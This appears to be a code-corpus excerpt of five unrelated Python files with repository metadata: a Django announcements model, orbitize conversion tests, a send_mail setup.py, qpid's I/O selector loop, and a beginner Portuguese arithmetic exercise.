ceaa4f0fcef25a5928a0cfbbf50c74a9afd263ab
|
[
"MIT"
] | 33
|
2016-02-20T19:36:40.000Z
|
2021-12-14T15:49:55.000Z
|
pinax/announcements/models.py
|
craigds/pinax-announcements
|
ceaa4f0fcef25a5928a0cfbbf50c74a9afd263ab
|
[
"MIT"
] | 19
|
2016-02-29T18:32:30.000Z
|
2022-03-28T21:15:15.000Z
|
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
class Announcement(models.Model):
"""
A single announcement.
"""
DISMISSAL_NO = 1
DISMISSAL_SESSION = 2
DISMISSAL_PERMANENT = 3
DISMISSAL_CHOICES = [
(DISMISSAL_NO, _("No Dismissals Allowed")),
(DISMISSAL_SESSION, _("Session Only Dismissal")),
(DISMISSAL_PERMANENT, _("Permanent Dismissal Allowed"))
]
title = models.CharField(_("title"), max_length=50)
content = models.TextField(_("content"))
creator = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name=_("creator"),
on_delete=models.CASCADE
)
creation_date = models.DateTimeField(_("creation_date"), default=timezone.now)
site_wide = models.BooleanField(_("site wide"), default=False)
members_only = models.BooleanField(_("members only"), default=False)
dismissal_type = models.IntegerField(choices=DISMISSAL_CHOICES, default=DISMISSAL_SESSION)
publish_start = models.DateTimeField(_("publish_start"), default=timezone.now)
publish_end = models.DateTimeField(_("publish_end"), blank=True, null=True)
def get_absolute_url(self):
return reverse("pinax_announcements:announcement_detail", args=[self.pk])
def dismiss_url(self):
if self.dismissal_type != Announcement.DISMISSAL_NO:
return reverse("pinax_announcements:announcement_dismiss", args=[self.pk])
def __str__(self):
return self.title
class Meta:
verbose_name = _("announcement")
verbose_name_plural = _("announcements")
class Dismissal(models.Model):
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name="announcement_dismissals",
on_delete=models.CASCADE
)
announcement = models.ForeignKey(
Announcement,
related_name="dismissals",
on_delete=models.CASCADE
)
dismissed_at = models.DateTimeField(default=timezone.now)
| 33.269841
| 94
| 0.70229
|
4a15d3d09feade89cbaa3135ad0049363487dce1
| 1,580
|
py
|
Python
|
tests/test_conversions.py
|
kkosmo/orbitize
|
5790100122f42224f9982e53d7338540a87c5fbc
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_conversions.py
|
kkosmo/orbitize
|
5790100122f42224f9982e53d7338540a87c5fbc
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_conversions.py
|
kkosmo/orbitize
|
5790100122f42224f9982e53d7338540a87c5fbc
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
"""
Test the orbitize.basis which converts orbital elements
"""
import pytest
import numpy as np
import orbitize.basis as basis
def test_tau_t0_conversion():
"""
Test conversion back and forth
"""
tau = 0.1
ref_epoch = 51000 # MJD
period = 10 # years
t0 = basis.tau_to_t0(tau, ref_epoch, period)
assert t0 == pytest.approx(51000 + 365.25, rel=1e-7)
tau2 = basis.t0_to_tau(t0, ref_epoch, period)
assert tau == pytest.approx(tau2, rel=1e-7)
t0 = basis.tau_to_t0(tau, ref_epoch, period, after_date=47000)
assert t0 == pytest.approx(51000 - 9 * 365.25, rel=1e-7)
tau3 = basis.t0_to_tau(t0, ref_epoch, period)
assert tau == pytest.approx(tau3, rel=1e-7)
def test_tau_t0_conversion_vector():
"""
Make sure it works vectorized.
"""
taus = np.array([0.1, 0.2])
ref_epoch = 55000 # MJD
period = np.array([1, 0.5]) # years
t0s = basis.tau_to_t0(taus, ref_epoch, period)
for t0 in t0s:
assert t0 == pytest.approx(55000 + 365.25/10, rel=1e-7)
def test_switch_tau_basis():
"""
Switch reference epochs
"""
old_taus = np.array([0.5, 0.5])
ref_epoch = np.array([50000, 55000])
period = np.array([2, 2])
new_epoch = np.array([50000 + 365.25, 55000 + 365.25])
new_taus = basis.switch_tau_epoch(old_taus, ref_epoch, new_epoch, period)
assert new_taus[0] == pytest.approx(0, rel=1e-7)
assert new_taus[1] == pytest.approx(0, rel=1e-7)
if __name__ == "__main__":
test_tau_t0_conversion()
test_tau_t0_conversion_vector()
test_switch_tau_basis()
| 27.719298
| 77
| 0.651266
|
4a15d55bc2017d4eaf2007775230f1cdaf32b229
| 772
|
py
|
Python
|
setup.py
|
farhadzaidi/send_mail
|
6bfa6a60db449c8d7b7a8878f87c3fe800524756
|
[
"MIT"
] | 1
|
2021-11-24T14:30:21.000Z
|
2021-11-24T14:30:21.000Z
|
setup.py
|
farhadzaidi/send_mail
|
6bfa6a60db449c8d7b7a8878f87c3fe800524756
|
[
"MIT"
] | null | null | null |
setup.py
|
farhadzaidi/send_mail
|
6bfa6a60db449c8d7b7a8878f87c3fe800524756
|
[
"MIT"
] | null | null | null |
from setuptools import setup
with open('README.md', 'r') as desc:
long_description = desc.read()
setup(
name='send_mail',
version='0.0.2',
description='Sending emails in python just became much easier',
py_modules=['send_mail'],
package_dir={'': 'src'},
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)",
"Operating System :: OS Independent",
],
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/farhadzaidi/send_mail',
author='Farhad Zaidi',
author_email='zaidi.farhad03@gmail.com',
install_requires=[
'easy_colors',
],
)
| 27.571429
| 79
| 0.708549
|
4a15d5666257811168e840f42cbe15dd26055259
| 4,397
|
py
|
Python
|
qpid/selector.py
|
gemmellr/qpid-python
|
e2ee8fd1dfb299d4dff68fe698e3f64414f00ab2
|
[
"Apache-2.0"
] | null | null | null |
qpid/selector.py
|
gemmellr/qpid-python
|
e2ee8fd1dfb299d4dff68fe698e3f64414f00ab2
|
[
"Apache-2.0"
] | null | null | null |
qpid/selector.py
|
gemmellr/qpid-python
|
e2ee8fd1dfb299d4dff68fe698e3f64414f00ab2
|
[
"Apache-2.0"
] | 1
|
2021-01-28T17:43:54.000Z
|
2021-01-28T17:43:54.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import atexit, time, errno, os
from compat import select, SelectError, set, selectable_waiter, format_exc
from threading import Thread, Lock
from logging import getLogger
log = getLogger("qpid.messaging")
class Acceptor:
def __init__(self, sock, handler):
self.sock = sock
self.handler = handler
def fileno(self):
return self.sock.fileno()
def reading(self):
return True
def writing(self):
return False
def readable(self):
sock, addr = self.sock.accept()
self.handler(sock)
class Selector:
lock = Lock()
DEFAULT = None
_current_pid = None
@staticmethod
def default():
Selector.lock.acquire()
try:
if Selector.DEFAULT is None or Selector._current_pid != os.getpid():
sel = Selector()
atexit.register(sel.stop)
sel.start()
Selector.DEFAULT = sel
Selector._current_pid = os.getpid()
return Selector.DEFAULT
finally:
Selector.lock.release()
def __init__(self):
self.selectables = set()
self.reading = set()
self.writing = set()
self.waiter = selectable_waiter()
self.reading.add(self.waiter)
self.stopped = False
self.thread = None
self.exception = None
def wakeup(self):
self.waiter.wakeup()
def register(self, selectable):
self.selectables.add(selectable)
self.modify(selectable)
def _update(self, selectable):
if selectable.reading():
self.reading.add(selectable)
else:
self.reading.discard(selectable)
if selectable.writing():
self.writing.add(selectable)
else:
self.writing.discard(selectable)
return selectable.timing()
def modify(self, selectable):
self._update(selectable)
self.wakeup()
def unregister(self, selectable):
self.reading.discard(selectable)
self.writing.discard(selectable)
self.selectables.discard(selectable)
self.wakeup()
def start(self):
self.stopped = False
self.thread = Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start();
def run(self):
try:
while not self.stopped:
wakeup = None
for sel in self.selectables.copy():
t = self._update(sel)
if t is not None:
if wakeup is None:
wakeup = t
else:
wakeup = min(wakeup, t)
rd = []
wr = []
ex = []
while True:
try:
if wakeup is None:
timeout = None
else:
timeout = max(0, wakeup - time.time())
rd, wr, ex = select(self.reading, self.writing, (), timeout)
break
except SelectError, e:
# Repeat the select call if we were interrupted.
if e[0] == errno.EINTR:
continue
else:
# unrecoverable: promote to outer try block
raise
for sel in wr:
if sel.writing():
sel.writeable()
for sel in rd:
if sel.reading():
sel.readable()
now = time.time()
for sel in self.selectables.copy():
w = sel.timing()
if w is not None and now > w:
sel.timeout()
except Exception, e:
self.exception = e
info = format_exc()
log.error("qpid.messaging I/O thread has died: %s" % str(e))
for sel in self.selectables.copy():
if hasattr(sel, "abort"):
sel.abort(e, info)
raise
def stop(self, timeout=None):
self.stopped = True
self.wakeup()
self.thread.join(timeout)
self.thread = None
| 26.172619
| 74
| 0.622015
|
4a15d6957255b6c810178a98172daa14c2644979
| 495
|
py
|
Python
|
World_1/005math.py
|
wesleyendliche/Python_exercises
|
44cdcb921201eb0b11ff1ac4b01b4a86859c2ffe
|
[
"MIT"
] | null | null | null |
World_1/005math.py
|
wesleyendliche/Python_exercises
|
44cdcb921201eb0b11ff1ac4b01b4a86859c2ffe
|
[
"MIT"
] | null | null | null |
World_1/005math.py
|
wesleyendliche/Python_exercises
|
44cdcb921201eb0b11ff1ac4b01b4a86859c2ffe
|
[
"MIT"
] | null | null | null |
n1 = int(input('Digite um valor: '))
n2 = int(input('Outro valor: '))
so = n1 + n2
su = n1 - n2
m = n1 * n2
d = n1 / n2
di = n1 // n2
e = n1 ** n2
#print('A soma é {}, a subtração é {}, o produto é {}'.format(so, su, m))
print('A \033[4;30msoma\033[m é {}, a \033[4;31msubtração\033[m é {}, \n O \033[4;32mproduto\033[m é {},'.format(so, su, m), end=' ')
print('A \033[4;33mdivisão\033[m é {:.2f}, \n A \033[4;34mdivisão inteira\033[m é {}, \n E a \033[4;35mpotência\033[m {}'.format(d, di, e))
| 41.25
| 139
| 0.573737
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.